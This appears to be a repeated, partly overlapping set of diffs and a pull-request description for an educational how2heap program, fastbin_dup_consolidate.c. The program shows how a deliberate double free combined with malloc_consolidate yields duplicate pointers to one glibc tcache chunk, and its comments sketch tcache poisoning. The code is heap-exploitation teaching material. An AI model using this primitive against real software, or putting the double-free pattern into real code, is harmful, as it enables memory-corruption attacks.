 biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize 
 a double free to gain control of a tcache sized chunk.   
-
 */
 
-int main() {
-	printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
-	printf("It would also allow us to perform tcache poisoning if we had a heap leak.\n\n");
+#define CHUNK_SIZE 0x400
 
-	printf("Lets fill up the tcache to force fastbin usage...\n\n");
+int main() {
+	printf("This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n");
+	printf("Lets prepare to fill up the tcache in order to force fastbin usage...\n\n");
 
 	void *ptr[7];
 
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
+
+	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
+	// void* ppoison = malloc(CHUNK_SIZE);
+
+	void* p1 = malloc(0x40);
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+
+	printf("Fill up the tcache...\n");
 	for(int i = 0; i < 7; i++)
 		free(ptr[i]);
 
-	// void* ppoison = malloc(0x400);
-	// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-
-	void* p1 = calloc(1,0x40);
-	// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679) 
-	// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
-
-	printf("Allocate another chunk of the same size p1=%p \n", p1);
-  	printf("Freeing p1 will add it to the fastbin.\n\n");
+  	printf("Now freeing p1 will add it to the fastbin.\n\n");
   	free(p1);
-
-  	void* p3 = malloc(0x400);
-
-	// free(ppoison);
-	// We can now free this chunk to put it in the tcache bin for the poison.
 
 	printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
 	printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
-	printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
+	printf("a tcache-sized chunk with chunk size 0x410 ");
+  	void* p2 = malloc(CHUNK_SIZE);
 
-	printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
-	printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
+	printf("p2=%p.\n", p2);
 
-	assert(p1 == p3);
+	// We could now free this chunk to put it in the tcache bin for the poison.
+	// free(ppoison);
 
-  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
-	free(p1); // vulnerability
+	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
+	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
-	printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
-	printf("We have thus achieved UAF on tcache!\n");
+	assert(p1 == p2);
 
-	// *(long long*)p3 = target ^ (p3 >> 12);
-	// We can use the UAF here to perform tcache poison.
+  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n");
+	free(p1); // vulnerability (double free)
+	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
-	printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
-	printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
-	void *p4 = malloc(0x400);
+	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
 
-	assert(p4 == p3);
+	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
+	// If we can edit chunk contents after it has been allocated,
+	// that gives us UAF here and allows us to perform tcache poison.
+	// We need to use a heap leak here due to safe linking.
+	//
+	// In reality since double free is usually the result of a dangling pointer,
+	// we likely (depending on the nature of the vulnerability) could have used
+	// the edit functionality on the dangling pointer directly. Oh well :)
 
-	printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
-	printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
+	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
+	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
+	void *p3 = malloc(CHUNK_SIZE);
+
+	assert(p3 == p2);
+
+	printf("We now have two pointers (p2 and p3) that haven't been directly freed\n");
+	printf("and both point to the same tcache sized chunk. p2=%p p3=%p\n", p2, p3);
 	printf("We have achieved duplication!\n\n");
 
 	printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
-	printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
+	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
+	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
+	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
+
+	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.39/fastbin_dup_consolidate.c
+++ b/glibc_2.39/fastbin_dup_consolidate.c
@@ -38,9 +38,6 @@ int main() {
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
 
-	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-	// void* ppoison = malloc(CHUNK_SIZE);
-
 	void* p1 = malloc(0x40);
 	printf("Allocate another chunk of the same size p1=%p \n", p1);
 
@@ -58,9 +55,6 @@ int main() {
 
 	printf("p2=%p.\n", p2);
 
-	// We could now free this chunk to put it in the tcache bin for the poison.
-	// free(ppoison);
-
 	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
 	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
@@ -71,15 +65,6 @@ int main() {
 	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
 	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
-
-	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
-	// If we can edit chunk contents after it has been allocated,
-	// that gives us UAF here and allows us to perform tcache poison.
-	// We need to use a heap leak here due to safe linking.
-	//
-	// In reality since double free is usually the result of a dangling pointer,
-	// we likely (depending on the nature of the vulnerability) could have used
-	// the edit functionality on the dangling pointer directly. Oh well :)
 
 	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
 	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
@@ -95,8 +80,6 @@ int main() {
 	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
 	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
 	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
-
-	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }

--- a/glibc_2.39/fastbin_dup_consolidate.c
+++ b/glibc_2.39/fastbin_dup_consolidate.c
@@ -22,71 +22,81 @@ As of glibc version 2.35 it is called only in the following five places:
 
 We will be targeting the first place, so we will need to allocate a chunk that does not belong in the 
 small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901). 
-This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Interestingly, the 
+This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Notably, the 
 biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize 
 a double free to gain control of a tcache sized chunk.   
-
 */
 
-int main() {
-	printf("This technique will make use of malloc_consolidate and a double free to gain a UAF / duplication in the tcache.\n");
-	printf("It would also allow us to perform tcache poisoning if we had a heap leak.\n\n");
+#define CHUNK_SIZE 0x400
 
-	printf("Lets fill up the tcache to force fastbin usage...\n\n");
+int main() {
+	printf("This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n");
+	printf("Lets prepare to fill up the tcache in order to force fastbin usage...\n\n");
 
 	void *ptr[7];
 
 	for(int i = 0; i < 7; i++)
 		ptr[i] = malloc(0x40);
+
+	// We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
+	// void* ppoison = malloc(CHUNK_SIZE);
+
+	void* p1 = malloc(0x40);
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+
+	printf("Fill up the tcache...\n");
 	for(int i = 0; i < 7; i++)
 		free(ptr[i]);
 
-	// void* ppoison = malloc(0x400);
-	// ^ We would have to allocate this to be able to do tcache poison later, since we need at least 2 chunks in a bin to do it.
-
-	void* p1 = calloc(1,0x40);
-	// Using calloc here doesn't take from the tcache since calloc calls _int_malloc (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3679) 
-	// and taking from the tcache is handled in __libc_malloc. If we used malloc(0x40) the chunk would get taken from the tcache.
-
-	printf("Allocate another chunk of the same size p1=%p \n", p1);
-  	printf("Freeing p1 will add it to the fastbin.\n\n");
+  	printf("Now freeing p1 will add it to the fastbin.\n\n");
   	free(p1);
-
-  	void* p3 = malloc(0x400);
-
-	// free(ppoison);
-	// We can now free this chunk to put it in the tcache bin for the poison.
 
 	printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
 	printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
-	printf("a tcache-sized chunk with chunk size 0x410. p3=%p\n", p3);
+	printf("a tcache-sized chunk with chunk size 0x410 ");
+  	void* p2 = malloc(CHUNK_SIZE);
 
-	printf("\nmalloc_consolidate will merge the fast chunk p1 with top.\n");
-	printf("p3 is allocated from top since there is no bin bigger than it. Thus, p1 = p3.\n");
+	printf("p2=%p.\n", p2);
 
-	assert(p1 == p3);
+	// We could now free this chunk to put it in the tcache bin for the poison.
+	// free(ppoison);
 
-  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p3).\n\n");
-	free(p1); // vulnerability
+	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
+	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
 
-	printf("So p1 is double freed, and p3 hasn't been freed although it now points to a free chunk.\n");
-	printf("We have thus achieved UAF on tcache!\n");
+	assert(p1 == p2);
 
-	// *(long long*)p3 = target ^ (p3 >> 12);
-	// We can use the UAF here to perform tcache poison.
+  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n");
+	free(p1); // vulnerability (double free)
+	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
 
-	printf("We will request a chunk of size 0x400, this will give us the 0x410 chunk thats currently in\n");
-	printf("the tcache bin. p3 and p1 will still be pointing to it.\n");
-	void *p4 = malloc(0x400);
+	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
 
-	assert(p4 == p3);
+	// *(long long*)p2 = target ^ ((long long)p2 >> 12);
+	// If we can edit chunk contents after it has been allocated,
+	// that gives us UAF here and allows us to perform tcache poison.
+	// We need to use a heap leak here due to safe linking.
+	//
+	// In reality since double free is usually the result of a dangling pointer,
+	// we likely (depending on the nature of the vulnerability) could have used
+	// the edit functionality on the dangling pointer directly. Oh well :)
 
-	printf("We now have two pointers (p3 and p4) that haven't been directly freed\n");
-	printf("and both point to the same tcache sized chunk. p3=%p p4=%p\n", p3, p4);
+	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
+	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
+	void *p3 = malloc(CHUNK_SIZE);
+
+	assert(p3 == p2);
+
+	printf("We now have two pointers (p2 and p3) that haven't been directly freed\n");
+	printf("and both point to the same tcache sized chunk. p2=%p p3=%p\n", p2, p3);
 	printf("We have achieved duplication!\n\n");
 
 	printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
-	printf("have behaved the same, just being taken from the top instead of from the tcache bin.");
+	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
+	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
+	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
+
+	// assert(malloc(CHUNK_SIZE) == (void*)target);
 
 	return 0;
 }


### PR DESCRIPTION
Handles: https://github.com/shellphish/how2heap/issues/200

Clarified some language to make it more clear this isn't a technique that (in general) gives tcache double free -> tcache poison. Cleaned up the explanation a bit.

I didn't touch versions 2.24 and 2.23 (which don't have tcache).